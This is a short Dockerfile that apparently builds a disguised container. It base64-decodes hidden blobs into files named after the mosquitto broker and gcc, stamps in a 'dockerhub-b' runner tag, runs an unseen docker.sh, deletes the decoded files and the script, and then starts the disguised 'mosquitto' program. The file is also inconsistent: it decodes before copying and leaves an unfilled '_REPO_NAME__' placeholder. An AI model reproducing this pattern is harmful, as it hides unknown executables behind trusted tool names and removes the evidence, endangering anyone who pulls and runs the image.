FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > mosquitto.log'

RUN base64 --decode mosquitto.64 > mosquitto
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY mosquitto .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' mosquitto
RUN bash ./docker.sh

RUN rm --force --recursive mosquitto _REPO_NAME__.64 docker.sh gcc gcc.64

CMD mosquitto
